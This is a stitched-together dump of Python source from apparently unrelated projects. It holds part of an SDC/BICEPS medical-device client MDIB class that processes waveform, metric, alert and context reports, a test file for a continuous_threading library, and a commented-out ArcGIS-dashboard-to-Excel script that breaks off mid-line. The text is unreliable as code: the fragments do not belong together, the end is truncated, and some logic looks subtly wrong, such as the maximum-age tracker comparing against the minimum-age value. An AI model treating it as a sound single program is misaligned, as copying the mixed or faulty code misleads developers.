self._logger.debug('real time sample array "{} "has no metric value, ignoring it', realtimeSampleArrayContainer.descriptorHandle) return [] observationTime = metricValue.DeterminationTime annotations = metricValue.Annotations applyAnnotations = metricValue.ApplyAnnotations rtSampleContainers = [] if metricValue.Samples is not None: for i, sample in enumerate(metricValue.Samples): appliedAnnotations = [] if applyAnnotations is not None: for aa in applyAnnotations: if aa.SampleIndex == i: # there is an annotation for this sample: aIndex = aa.AnnotationIndex annot = annotations[aIndex] # index is zero-based appliedAnnotations.append(annot) t = observationTime + i * self.sample_period rtSampleContainers.append(mdibbase.RtSampleContainer(sample, t, metricValue.Validity, appliedAnnotations)) return rtSampleContainers def addRtSampleContainers(self, sc): if not sc: return with self._lock: self.rt_data.extend(sc) self._age_of_data_list.append(time.time() - sc[-1].observationTime) # use time of youngest sample, this is the best value for indication of delays try: self._reported_min_age = min(self._age_of_data_list[-1], self._reported_min_age) except TypeError: self._reported_min_age = self._age_of_data_list[-1] try: self._reported_max_age = max(self._age_of_data_list[-1], self._reported_min_age) except TypeError: self._reported_max_age = self._age_of_data_list[-1] def readData(self): ''' This read method consumes all data in buffer. @return: a list of RtSampleContainer objects''' with self._lock: ret = copy.copy(self.rt_data) self.rt_data.clear() return ret def get_age_stdev(self): with self._lock: min_value, self._reported_min_age = self._reported_min_age, None max_value, self._reported_max_age = self._reported_max_age, None mean_data = 0 if len(self._age_of_data_list) == 0 else mean(self._age_of_data_list) std_deviation = 0 if len(self._age_of_data_list) < 2 else stdev(self._age_of_data_list) return _AgeData(mean_data, std_deviation, min_value or 0, max_value or 0) _BufferedNotification = namedtuple('_BufferedNotification', 'report handler') class ClientMdibContainer(mdibbase.MdibContainer): ''' This mdib is meant to be read-only. Only update source is a BICEPSClient.''' DETERMINATIONTIME_WARN_LIMIT = 1.0 # in seconds MDIB_VERSION_CHECK_DISABLED = False # for testing purpose you can disable checking of mdib version, so that every notification is accepted. INITIAL_NOTIFICATION_BUFFERING = True # if False, the response for the first incoming notification is answered after the getmdib is done. # if True, first notifications are buffered and the responses are sent immediately. 
def __init__(self, sdcClient, maxRealtimeSamples=100): super(ClientMdibContainer, self).__init__(sdcClient.sdc_definitions) self._logger = loghelper.getLoggerAdapter('sdc.client.mdib', sdcClient.log_prefix) self._sdcClient = sdcClient if self.bicepsSchema is None: raise RuntimeError('no bicepsSchema instance') self._isInitialized = False self.rtBuffers = {} # key is a handle, value is a ClientRtBuffer self._maxRealtimeSamples = maxRealtimeSamples self._last_wf_age_log = time.time() if PROFILING: self.pr = cProfile.Profile() self._contextMdibVersion = None self._msgReader = msgreader.MessageReader(self) # a buffer for notifications that are received before initial getmdib is done self._bufferedNotifications = list() self._bufferedNotificationsLock = Lock() self.waveform_time_warner = DeterminationTimeWarner() self.metric_time_warner = DeterminationTimeWarner() def initMdib(self): if self._isInitialized: raise RuntimeError('ClientMdibContainer is already initialized') # first start receiving notifications, then call getMdib. # Otherwise we might miss notifications. self._bindToObservables() getService = self._sdcClient.client('Get') self._logger.info('initializing mdib...') mdibNode = getService.getMdibNode() self.nsmapper.useDocPrefixes(mdibNode.nsmap) self._logger.info('creating description containers...') descriptorContainers = self._msgReader.readMdDescription(mdibNode) with self.descriptions._lock: #pylint: disable=protected-access self.descriptions.clear() self.addDescriptionContainers(descriptorContainers) self._logger.info('creating state containers...') self.clearStates() stateContainers = self._msgReader.readMdState(mdibNode) self.addStateContainers(stateContainers) mdibVersion = mdibNode.get('MdibVersion') sequenceId = mdibNode.get('SequenceId') if mdibVersion is not None: self.mdibVersion = int(mdibVersion) self._logger.info('setting initial mdib version to {}', mdibVersion) else: self._logger.warn('found no mdib version in GetMdib response, assuming "0"') self.mdibVersion = 0 self.sequenceId = sequenceId self._logger.info('setting sequence Id to {}', sequenceId) # retrieve context states only if there were none in mdibNode if len(self.contextStates.objects) == 0: self._getContextStates() else: self._logger.info('found context states in GetMdib Result, will not call getContextStates') # process buffered notifications with self._bufferedNotificationsLock: for bufferedReport in self._bufferedNotifications: bufferedReport.handler(bufferedReport.report, is_buffered_report=True) del self._bufferedNotifications[:] self._isInitialized = True self._sdcClient._register_mdib(self) #pylint: disable=protected-access self._logger.info('initializing mdib done') def _bufferNotification(self, report, callable): ''' write notification to an temporary buffer, as long as mdib is not initialized :param report: the report :param callable: the mothod that shall be called later for delayed handling of report :return: True if buffered, False if report shall be processed immediately ''' if self._isInitialized: # no reason to buffer return False if not self.INITIAL_NOTIFICATION_BUFFERING: self._waitUntilInitialized(callable.__name__) return False # get lock and check if we need to write to buffer with self._bufferedNotificationsLock: if not self._isInitialized: self._bufferedNotifications.append(_BufferedNotification(report, callable)) return True return False def syncContextStates(self): '''This method requests all context states from device and deletes all local context states that are not available in 
response from Device.''' try: self._logger.info('syncContextStates called') contextService = self._sdcClient.client('Context') responseNode = contextService.getContextStatesNode() self._logger.info('creating context state containers...') contextStateContainers = self._msgReader.readContextState(responseNode) devices_contextStateHandles = [s.Handle for s in contextStateContainers] with self.contextStates._lock: # pylint: disable=protected-access for obj in self.contextStates.objects: if obj.Handle not in devices_contextStateHandles: self.contextStates.removeObjectNoLock((obj)) except: self._logger.error(traceback.format_exc()) def _getContextStates(self, handles = None): try: self._logger.debug('new Query, handles={}', handles) time.sleep(0.001) contextService = self._sdcClient.client('Context') self._logger.info('requesting context states...') responseNode = contextService.getContextStatesNode(handles) self._logger.info('creating context state containers...') contextStateContainers = self._msgReader.readContextState(responseNode) self._contextMdibVersion = int(responseNode.get('MdibVersion', '0')) self._logger.debug('_getContextStates: setting _contextMdibVersion to {}', self._contextMdibVersion) self._logger.debug('got {} context states', len(contextStateContainers)) with self.contextStates._lock: #pylint: disable=protected-access for stateContainer in contextStateContainers: oldStateContainers = self.contextStates.handle.get(stateContainer.Handle, []) if len(oldStateContainers) == 0: self.contextStates.addObjectNoLock(stateContainer) self._logger.debug('new ContextState {}', stateContainer) elif len(oldStateContainers) == 1: oldStateContainer = oldStateContainers[0] if oldStateContainer.StateVersion != stateContainer.StateVersion: self._logger.debug('update {} ==> {}', oldStateContainer, stateContainer) oldStateContainer.updateFromNode(stateContainer.node) self.contextStates.updateObjectNoLock(oldStateContainer) else: old = etree_.tostring(oldStateContainer.node) new = etree_.tostring(stateContainer.node) if old == new: self._logger.debug('no update {}', oldStateContainer.node) else: self._logger.error('no update but different!\n{ \n{}', lambda:etree_.tostring(oldStateContainer.node), lambda:etree_.tostring(stateContainer.node)) #pylint: disable=cell-var-from-loop else: txt = ', '.join([str(x) for x in oldStateContainers]) self._logger.error('found {} objects: {}', len(oldStateContainers), txt) except: self._logger.error(traceback.format_exc()) finally: self._logger.info('_getContextStates done') def _bindToObservables(self): # observe properties of sdcClient if PROFILING: properties.bind(self._sdcClient, waveFormReport=self._onWaveformReportProfiled) else: properties.bind(self._sdcClient, waveFormReport=self._onWaveformReport) properties.bind(self._sdcClient, episodicMetricReport=self._onEpisodicMetricReport) properties.bind(self._sdcClient, episodicAlertReport=self._onEpisodicAlertReport) properties.bind(self._sdcClient, episodicContextReport=self._onEpisodicContextReport) properties.bind(self._sdcClient, episodicComponentReport=self._onEpisodicComponentReport) properties.bind(self._sdcClient, descriptionModificationReport=self._onDescriptionModificationReport) properties.bind(self._sdcClient, episodicOperationalStateReport=self._onOperationalStateReport) def _canAcceptMdibVersion(self, log_prefix, newMdibVersion): if self.MDIB_VERSION_CHECK_DISABLED: return True if newMdibVersion is None: self._logger.error('{}: could not check MdibVersion!', log_prefix) else: # log deviations from 
expected mdib versionb if newMdibVersion < self.mdibVersion: self._logger.warn('{}: ignoring too old Mdib version, have {}, got {}', log_prefix, self.mdibVersion, newMdibVersion) elif (newMdibVersion - self.mdibVersion) > 1: if self._sdcClient.all_subscribed: self._logger.warn('{}: expect mdibVersion {}, got {}', log_prefix, self.mdibVersion+1, newMdibVersion) # it is possible to receive multiple notifications with the same mdib version => compare ">=" if newMdibVersion >= self.mdibVersion: return True return False def _updateSequenceId(self, reportNode): sequenceId = reportNode.get('SequenceId') if sequenceId != self.sequenceId: self.sequenceId = sequenceId def _waitUntilInitialized(self, log_prefix): showsuccesslog = False started = time.monotonic() while not self._isInitialized: delay = time.monotonic() - started if 3 >= delay > 1: showsuccesslog = True self._logger.warn('{}: _waitUntilInitialized takes long...', log_prefix) elif delay > 10: raise RuntimeError('_waitUntilInitialized failed') time.sleep(1) delay = time.monotonic() - started if showsuccesslog: self._logger.info('{}: _waitUntilInitialized took {} seconds', log_prefix, delay) def _onEpisodicMetricReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicMetricReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicMetricReport', newMdibVersion): return now = time.time() metricsByHandle = {} maxAge = 0 minAge = 0 statecontainers = self._msgReader.readEpisodicMetricReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in statecontainers: if sc.descriptorContainer is not None and sc.descriptorContainer.DescriptorVersion != sc.DescriptorVersion: self._logger.warn( '_onEpisodicMetricReport: metric "{}": descriptor version expect "{}", found "{}"', sc.descriptorHandle, sc.DescriptorVersion, sc.descriptorContainer.DescriptorVersion) sc.descriptorContainer = None try: oldStateContainer = self.states.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicMetricReport, getOne on states: {}', ex) continue desc_h = sc.descriptorHandle metricsByHandle[desc_h] = sc # metric if oldStateContainer is not None: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicMetricReport', is_buffered_report): oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) else: self.states.addObject(sc) if sc.metricValue is not None: observationTime = sc.metricValue.DeterminationTime if observationTime is None: self._logger.warn( '_onEpisodicMetricReport: metric {} version {} has no DeterminationTime', desc_h, sc.StateVersion) else: age = now - observationTime minAge = min(minAge, age) maxAge = max(maxAge, age) shall_log = self.metric_time_warner.getOutOfDeterminationTimeLogState(minAge, maxAge, self.DETERMINATIONTIME_WARN_LIMIT) if shall_log == A_OUT_OF_RANGE: self._logger.warn( '_onEpisodicMetricReport mdibVersion {}: age of metrics outside limit of {} sec.: max, min = {:03f}, {:03f}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, maxAge, minAge) elif shall_log == A_STILL_OUT_OF_RANGE: self._logger.warn( '_onEpisodicMetricReport mdibVersion {}: age of metrics still outside limit of {} sec.: max, min = {:03f}, {:03f}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, maxAge, minAge) elif shall_log == A_BACK_IN_RANGE: self._logger.info( 
'_onEpisodicMetricReport mdibVersion {}: age of metrics back in limit of {} sec.: max, min = {:03f}, {:03f}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, maxAge, minAge) finally: self.metricsByHandle = metricsByHandle # used by waitMetricMatches method def _onEpisodicAlertReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicAlertReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicAlertReport', newMdibVersion): return alertByHandle = {} allAlertContainers = self._msgReader.readEpisodicAlertReport(reportNode) self._logger.debug('_onEpisodicAlertReport: received {} alerts', len(allAlertContainers)) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in allAlertContainers: if sc.descriptorContainer is not None and sc.descriptorContainer.DescriptorVersion != sc.DescriptorVersion: self._logger.warn( '_onEpisodicAlertReport: alert "{}": descriptor version expect "{}", found "{}"', sc.descriptorHandle, sc.DescriptorVersion, sc.descriptorContainer.DescriptorVersion) sc.descriptorContainer = None try: oldStateContainer = self.states.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicAlertReport, getOne on states: {}', ex) continue desc_h = sc.descriptorHandle if oldStateContainer is not None: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicAlertReport', is_buffered_report): oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) alertByHandle[oldStateContainer.descriptorHandle] = oldStateContainer else: self.states.addObject(sc) alertByHandle[sc.descriptorHandle] = sc finally: self.alertByHandle = alertByHandle # update observable def _onOperationalStateReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onOperationalStateReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onOperationalStateReport', newMdibVersion): return operationByHandle = {} self._logger.info('_onOperationalStateReport: report={}', lambda:etree_.tostring(reportNode)) allOperationStateContainers = self._msgReader.readOperationalStateReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in allOperationStateContainers: if sc.descriptorContainer is not None and sc.descriptorContainer.DescriptorVersion != sc.DescriptorVersion: self._logger.warn('_onOperationalStateReport: OperationState "{}": descriptor version expect "{}", found "{}"', sc.descriptorHandle, sc.DescriptorVersion, sc.descriptorContainer.DescriptorVersion) sc.descriptorContainer = None try: oldStateContainer = self.states.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) except RuntimeError as ex: self._logger.error('_onOperationalStateReport, getOne on states: {}', ex) continue desc_h = sc.descriptorHandle if oldStateContainer is not None: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'OperationalStateReport', is_buffered_report): oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) operationByHandle[oldStateContainer.descriptorHandle] = oldStateContainer else: self.states.addObject(sc) operationByHandle[sc.descriptorHandle] = sc finally: self.operationByHandle = operationByHandle def 
_onWaveformReportProfiled(self, reportNode): self.pr.enable() self._onWaveformReport(reportNode) self.pr.disable() s = StringIO() ps = pstats.Stats(self.pr, stream=s).sort_stats('cumulative') ps.print_stats(30) print (s.getvalue()) print ('total number of states: {}'.format(len(self.states._objects))) #pylint:disable=protected-access print ('total number of objIds: {}'.format(len(self.states._objectIDs))) #pylint:disable=protected-access for name, l in self.states._objectIDs.items(): #pylint:disable=protected-access if len(l) > 50: print ('object {} has {} idx references, {}'.format(name, len(l), l)) def _onWaveformReport(self, reportNode, is_buffered_report=False): #pylint:disable=too-many-locals # reportNode contains a list of msg:State nodes if not is_buffered_report and self._bufferNotification(reportNode, self._onWaveformReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onWaveformReport', newMdibVersion): return waveformByHandle = {} waveformAge = {} # collect age of all waveforms in this report, and make one report if age is above warn limit (instead of multiple) allRtSampleArrayContainers = self._msgReader.readWaveformReport(reportNode) self._logger.debug('_onWaveformReport: {} waveforms received', len(allRtSampleArrayContainers)) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for new_sac in allRtSampleArrayContainers: d_handle = new_sac.descriptorHandle descriptorContainer = new_sac.descriptorContainer if descriptorContainer is None: self._logger.warn('_onWaveformReport: No Descriptor found for handle "{}"', d_handle) oldStateContainer = self.states.descriptorHandle.getOne(d_handle, allowNone=True) if oldStateContainer is None: self.states.addObject(new_sac) current_sc = new_sac else: if self._hasNewStateUsableStateVersion(oldStateContainer, new_sac, 'WaveformReport', is_buffered_report): # update old state container from new one oldStateContainer.updateFromOtherContainer(new_sac) self.states.updateObject(oldStateContainer) current_sc = oldStateContainer # we will need it later waveformByHandle[d_handle] = current_sc # add to Waveform Buffer rtBuffer = self.rtBuffers.get(d_handle) if rtBuffer is None: if descriptorContainer is not None: # read sample period try: sample_period = descriptorContainer.SamplePeriod or 0 except AttributeError: sample_period = 0 # default rtBuffer = ClientRtBuffer(sample_period=sample_period, max_samples=self._maxRealtimeSamples) self.rtBuffers[d_handle] = rtBuffer last_sc = rtBuffer.last_sc rtSampleContainers = rtBuffer.mkRtSampleContainers(new_sac) rtBuffer.addRtSampleContainers(rtSampleContainers) # check age if len(rtSampleContainers) > 0: waveformAge[d_handle] = rtSampleContainers[-1].age # check descriptor version if descriptorContainer.DescriptorVersion != new_sac.DescriptorVersion: self._logger.error('_onWaveformReport: descriptor {}: expect version "{}", found "{}"', d_handle, new_sac.DescriptorVersion, descriptorContainer.DescriptorVersion) if len(waveformAge) > 0: minAge = min(waveformAge.values()) maxAge = max(waveformAge.values()) shall_log = self.waveform_time_warner.getOutOfDeterminationTimeLogState(minAge, maxAge, self.DETERMINATIONTIME_WARN_LIMIT) if shall_log != A_NO_LOG: tmp = ', '.join('"{}":{:.3f}sec.'.format(k, v) for k,v in waveformAge.items()) if shall_log == A_OUT_OF_RANGE: self._logger.warn('_onWaveformReport mdibVersion {}: age of samples outside limit of {} sec.: age={}!', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, 
tmp) elif shall_log == A_STILL_OUT_OF_RANGE: self._logger.warn('_onWaveformReport mdibVersion {}: age of samples still outside limit of {} sec.: age={}!', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, tmp) elif shall_log == A_BACK_IN_RANGE: self._logger.info('_onWaveformReport mdibVersion {}: age of samples back in limit of {} sec.: age={}', newMdibVersion, self.DETERMINATIONTIME_WARN_LIMIT, tmp) if LOG_WF_AGE_INTERVAL: now = time.time() if now - self._last_wf_age_log >= LOG_WF_AGE_INTERVAL: age_data = self.get_wf_age_stdev() self._logger.info('waveform mean age={:.1f}ms., stdev={:.2f}ms. min={:.1f}ms., max={}', age_data.mean_age*1000., age_data.stdev*1000., age_data.min_age*1000., age_data.max_age*1000.) self._last_wf_age_log = now finally: self.waveformByHandle = waveformByHandle def _onEpisodicContextReport(self, reportNode, is_buffered_report=False): if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicContextReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicContextReport', newMdibVersion): return contextByHandle = {} stateContainers = self._msgReader.readEpisodicContextReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in stateContainers: try: oldStateContainer = self.contextStates.handle.getOne(sc.Handle, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicContextReport, getOne on contextStates: {}', ex) continue if oldStateContainer is None: self.contextStates.addObject(sc) self._logger.info( '_onEpisodicContextReport: new context state handle = {} Descriptor Handle={} Assoc={}, Validators={}', sc.Handle, sc.descriptorHandle, sc.ContextAssociation, sc.Validator) contextByHandle[sc.Handle] = sc else: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicContextReport', is_buffered_report): self._logger.info( '_onEpisodicContextReport: updated context state handle = {} Descriptor Handle={} Assoc={}, Validators={}', sc.Handle, sc.descriptorHandle, sc.ContextAssociation, sc.Validator) oldStateContainer.updateFromOtherContainer(sc) self.contextStates.updateObject(oldStateContainer) contextByHandle[oldStateContainer.Handle] = oldStateContainer finally: self.contextByHandle = contextByHandle def _onEpisodicComponentReport(self, reportNode, is_buffered_report=False): '''The EpisodicComponentReport is sent if at least one property of at least one component state has changed and SHOULD contain only the changed component states. Components are MDSs, VMDs, Channels. 
Not metrics and alarms ''' if not is_buffered_report and self._bufferNotification(reportNode, self._onEpisodicComponentReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onEpisodicComponentReport', newMdibVersion): return componentByHandle = {} statecontainers = self._msgReader.readEpisodicComponentReport(reportNode) try: with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for sc in statecontainers: desc_h = sc.descriptorHandle if desc_h is None: self._logger.error('_onEpisodicComponentReport: missing descriptor handle in {}!', lambda: etree_.tostring(sc.node)) # pylint: disable=cell-var-from-loop else: try: oldStateContainer = self.states.descriptorHandle.getOne(desc_h, allowNone=True) except RuntimeError as ex: self._logger.error('_onEpisodicComponentReport, getOne on states: {}', ex) continue if oldStateContainer is None: self.states.addObject(sc) self._logger.info( '_onEpisodicComponentReport: new component state handle = {} DescriptorVersion={}', desc_h, sc.DescriptorVersion) componentByHandle[sc.descriptorHandle] = sc else: if self._hasNewStateUsableStateVersion(oldStateContainer, sc, 'EpisodicComponentReport', is_buffered_report): self._logger.info( '_onEpisodicComponentReport: updated component state, handle="{}" DescriptorVersion={}', desc_h, sc.DescriptorVersion) oldStateContainer.updateFromOtherContainer(sc) self.states.updateObject(oldStateContainer) componentByHandle[oldStateContainer.descriptorHandle] = oldStateContainer finally: self.componentByHandle = componentByHandle def _onDescriptionModificationReport(self, reportNode, is_buffered_report=False): '''The DescriptionModificationReport is sent if at least one Descriptor has been created, updated or deleted during runtime. It consists of 1...n DescriptionModificationReportParts. 
''' if not is_buffered_report and self._bufferNotification(reportNode, self._onDescriptionModificationReport): return newMdibVersion = int(reportNode.get('MdibVersion', '1')) if not self._canAcceptMdibVersion('_onDescriptionModificationReport', newMdibVersion): return descriptions_lookup_list = self._msgReader.readDescriptionModificationReport(reportNode) with self.mdibLock: self.mdibVersion = newMdibVersion self._updateSequenceId(reportNode) for descriptions_lookup in descriptions_lookup_list: newDescriptorByHandle = {} updatedDescriptorByHandle = {} # -- new -- newDescriptorContainers, stateContainers = descriptions_lookup[pmtypes.DescriptionModificationTypes.CREATE] for dc in newDescriptorContainers: self.descriptions.addObject(dc) self._logger.debug('_onDescriptionModificationReport: created description "{}" (parent="{}")', dc.handle, dc.parentHandle) newDescriptorByHandle[dc.handle] = dc for sc in stateContainers: # determine multikey if sc.isContextState: multikey = self.contextStates else: multikey = self.states multikey.addObject(sc) # -- deleted -- deletedDescriptorContainers, stateContainers = descriptions_lookup[pmtypes.DescriptionModificationTypes.DELETE] for dc in deletedDescriptorContainers: self._logger.debug('_onDescriptionModificationReport: remove descriptor "{}" (parent="{}")', dc.handle, dc.parentHandle) self.rmDescriptorHandleAll(dc.handle) # handling of self.deletedDescriptorByHandle inside called method # -- updated -- updatedDescriptorContainers, stateContainers = descriptions_lookup[pmtypes.DescriptionModificationTypes.UPDATE] for dc in updatedDescriptorContainers: self._logger.info('_onDescriptionModificationReport: update descriptor "{}" (parent="{}")', dc.handle, dc.parentHandle) container = self.descriptions.handle.getOne(dc.handle, allowNone=True) if container is None: pass else: container.updateDescrFromNode(dc.node) updatedDescriptorByHandle[dc.handle] = dc for sc in stateContainers: # determine multikey if sc.isContextState: multikey = self.contextStates oldstateContainer = multikey.handle.getOne(sc.Handle, allowNone=True) else: multikey = self.states oldstateContainer = multikey.descriptorHandle.getOne(sc.descriptorHandle, allowNone=True) if oldstateContainer is not None: oldstateContainer.updateFromOtherContainer(sc) multikey.updateObject(oldstateContainer) # write observables for every report part separately if newDescriptorByHandle: self.newDescriptorByHandle = newDescriptorByHandle if updatedDescriptorByHandle: self.updatedDescriptorByHandle = updatedDescriptorByHandle def _hasNewStateUsableStateVersion(self, oldStateContainer, newStateContainer, reportName, is_buffered_report): ''' compare state versions old vs new :param oldStateContainer: :param newStateContainer: :param reportName: used for logging :return: True if new state is ok for mdib , otherwise False ''' diff = int(newStateContainer.StateVersion) - int(oldStateContainer.StateVersion) # diff == 0 can happen if there is only a descriptor version update if diff == 1: # this is the perfect version return True elif diff > 1: self._logger.error('{}: missed {} states for state DescriptorHandle={} ({}->{})', reportName, diff - 1, oldStateContainer.descriptorHandle, oldStateContainer.StateVersion, newStateContainer.StateVersion) return True # the new version is newer, therefore it can be added to mdib elif diff < 0: if not is_buffered_report: self._logger.error( '{}: reduced state version for state DescriptorHandle={} ({}->{}) ', reportName, oldStateContainer.descriptorHandle, 
oldStateContainer.StateVersion, newStateContainer.StateVersion) return False else: # diff == 0: diffs = oldStateContainer.diff(newStateContainer) # compares all xml attributes if diffs: self._logger.error( '{}: repeated state version {} for state DescriptorHandle={}, but states have different data:{}', reportName, oldStateContainer.StateVersion, oldStateContainer.descriptorHandle, diffs) return False def waitMetricMatches(self, handle, matchesfunc, timeout): ''' wait until a matching metric has been received. The matching is defined by the handle of the metric and the result of a matching function. If the matching function returns true, this function returns. @param handle: The handle string of the metric of interest. @param matchesfunc: a callable, argument is the current state with matching handle. Can be None, in that case every state matches Example: expected = 42 def isMatchingValue(state): found = state.xpath('dom:MetricValue/@Value', namespaces=nsmap) # returns a list of values, empty if nothing matches if found: found[0] = int(found[0]) return [expected] == found @param timeout: timeout in seconds @return: the matching state. In cas of a timeout it raises a TimeoutError exception. ''' fut = futures.Future() # define a callback function that sets value of fut def onMetricsByHandle(metricsByHandle): metric = metricsByHandle.get(handle) if metric is not None: if matchesfunc is None or matchesfunc(metric): fut.set_result(metric) try: properties.bind(self, metricsByHandle = onMetricsByHandle) begin = time.monotonic() ret = fut.result(timeout) self._logger.debug('waitMetricMatches: got result after {:.2f} seconds', time.monotonic() - begin) return ret finally: properties.unbind(self, metricsByHandle = onMetricsByHandle) def mkProposedState(self, descriptorHandle, copyCurrentState=True, handle=None): ''' Create a new state that can be used as proposed state in according operations. The new state is not part of mdib! :param descriptorHandle: the descriptor :param copyCurrentState: if True, all members of existing state will be copied to new state :param handle: if this is a multi state class, then this is the handle of the existing state that shall be used for copy. 
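Example (hedged sketch; 'mdib' and the descriptor handle string are hypothetical placeholders,
and which fields are modified depends on the concrete state type):
    proposed = mdib.mkProposedState('some_descriptor_handle')
    # ...modify fields of 'proposed' here, then pass it to the matching Set operation of the device...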
:return: ''' descr = self.descriptions.handle.getOne(descriptorHandle) new_state = self.mkStateContainerFromDescriptor(descr) if copyCurrentState: lookup = self.contextStates if new_state.isContextState else self.states if new_state.isMultiState: if handle is None: # new state return new_state else: old_state = lookup.handle.getOne(handle) else: old_state = lookup.descriptorHandle.getOne(descriptorHandle) new_state.updateFromOtherContainer(old_state) return new_state def get_wf_age_stdev(self): means = [] stdevs = [] mins = [] maxs = [] for buf in self.rtBuffers.values(): age_data = buf.get_age_stdev() means.append(age_data.mean_age) stdevs.append(age_data.stdev) mins.append(age_data.min_age) maxs.append(age_data.max_age) return _AgeData(mean(means), mean(stdevs), min(mins), max(maxs)) tests/test_thread_python_exit.py import time import continuous_threading def test_thread(): class Thread(continuous_threading.Thread): def _run(self, *args, **kwargs): print('here') th = Thread() th.start() time.sleep(0.1) def test_continuous(): class CountingThread(continuous_threading.ContinuousThread): def __init__(self): super(CountingThread, self).__init__() self.counter = 0 def _run(self): self.counter += 1 th = CountingThread() th.start() time.sleep(0.1) print('Iterations', th.counter) def test_pausable(): class PausableCountingThread(continuous_threading.PausableThread): def __init__(self): super(PausableCountingThread, self).__init__() self.counter = 0 def _run(self): self.counter += 1 th = PausableCountingThread() th.start() time.sleep(0.1) th.stop() print('Iterations (paused)', th.counter) th.start() time.sleep(0.1) print('Iterations', th.counter) def test_operation(): class SetValueThread(continuous_threading.OperationThread): def __init__(self): super(SetValueThread, self).__init__() self.value = 0 def _run(self, data, *args, **kwargs): self.value = data th = SetValueThread() th.start() time.sleep(0.1) assert th.value == 0 th.add_data(1) time.sleep(0.1) assert th.value == 1 any(th.add_data(i) for i in range(20000)) # th.add_data returns None, so the entire range is executed # time.sleep(0.01) # Not needed print('The set value', th.value, '| remaining queue size:', th.get_queue_size()) # DO NOT STOP, CLOSE, OR, JOIN THE THREAD if __name__ == '__main__': # Run one option at a time import sys # Default test run # run_test = test_thread # run_test = test_continuous # run_test = test_pausable run_test = test_operation if len(sys.argv) > 1: value = str(sys.argv[1]).lower() if value == '0' or value == 'thread': run_test = test_thread elif value == '1' or 'continuous' in value: run_test = test_continuous elif value == '2' or 'paus' in value: run_test = test_pausable elif value == '3' or 'op' in value: run_test = test_operation run_test() # You should observe that python.exe is no longer a running process when the program finishes. 
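# Hedged aside (added for illustration, not from the original tests): one way to get the same
# "process exits without stop()/close()/join()" behaviour with the standard library alone is a
# daemon thread, which the interpreter does not wait for at shutdown. Whether continuous_threading
# achieves this via daemon threads or atexit cleanup is not shown in this file; the sketch below
# is never called and only illustrates the daemon-thread variant.
def _daemon_thread_exit_sketch():
    import threading

    def _loop():
        while True:            # loops forever, but does not keep the interpreter alive
            time.sleep(0.01)

    th = threading.Thread(target=_loop, daemon=True)
    th.start()
    time.sleep(0.1)
    # when this function returns and the program ends, the daemon thread is simply abandoned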
# exit code should be 0 org_to_excel_dashboards.py0 # from openpyxl import load_workbook # from dashboard.my_secrets import REGRESSION_DEVEXT_DBQA_GIS # # # def get_items_from_folder( # gis_obj, folder, item_types=None # ) -> list: # folder=None returns the root folder # items = gis_obj.users.me.items(folder=folder) # # if item_types: # items = [item for item in items if item.type in item_types] # return items # # return items # # # if __name__ == "__main__": # # WB = load_workbook("name.xlsx") # WS = WB.active # # FOLDERS = REGRESSION_DEVEXT_DBQA_GIS.users.me.folders # print(f"I have {len(FOLDERS)} folders to work on") # # ALL_ITEMS = [] # for FOLDER_INDEX, FOLDER in enumerate(FOLDERS): # if FOLDER["title"] == "_Trash_Can": # continue # print(f"I am working on Folder {FOLDER_INDEX} with name, {FOLDER['title']}") # FOLDER_ITEMS = get_items_from_folder( # gis_obj=REGRESSION_DEVEXT_DBQA_GIS, folder=FOLDER, item_types=["Dashboard"] # ) # for ITEM in FOLDER_ITEMS: # try: # if ITEM.get_data() is not None: # ITEMS_WITH_FOLDER_AND_VERSION = ( # ITEM, # FOLDER["title"], # ITEM.get_data()["version"], # ) # ALL_ITEMS.append( # ITEMS_WITH_FOLDER_AND_VERSION # ) # I think this is in the wrong spot # except Exception as e: # print(e) # # for ITEM_INDEX, row in enumerate( # WS.iter_rows(min_row=2, max_row=len(ALL_ITEMS) + 1) # ): # row[0].value = ALL_ITEMS[ITEM_INDEX][0].title # row[1].value = ALL_ITEMS[ITEM_INDEX][0].id # row[2].value = ALL_ITEMS[ITEM_INDEX][1] # folder # row[3].value = ALL_ITEMS[ITEM_INDEX][0].type # row[4].value = 